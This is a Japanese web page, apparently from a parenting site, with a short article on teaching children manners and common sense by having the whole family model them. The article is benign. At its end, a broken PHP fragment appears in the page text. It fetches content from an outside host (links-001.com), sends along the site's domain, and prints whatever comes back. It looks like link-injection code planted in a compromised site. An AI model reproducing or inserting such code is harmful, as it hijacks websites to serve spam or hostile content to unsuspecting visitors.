前へ
次へ

家族全員でできるこまやかな教育

大人になっても常識がない人や、基本的な礼儀作法を身につけていない人がいます。
常識にしばられず生きていくのも素晴らしいことですが、まだまだ日本の社会では「親の顔がみたい」と言われてしまいます。
豊かな教養や一般常識を身につけるには、家族全員で体現してみせることがいちばんです。
たとえば、畳のヘリを踏んではいけないという礼儀作法がありますが、これは普段から大人が避けて歩いていれば子どもがめざとく見つけ、「そういうものなのか」と自然に身に付きます。
ドアを足で閉めない、口にものを入れたまま話さないなど、口うるさく言うのではなく家族全員でやってみせてあげましょう。
お客さんが来たら座布団を出す、食べ終わった食器は水に浸けて洗いやすくしておく、など、いちいち口で言うまでもなく、これらは大人の行動を見せるだけで十分に身に付くものです。
礼儀や常識を子どもに押し付けてしまうと、子どもが社会で生きづらくなってしまうこともあるのでそれだけは注意が必要です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top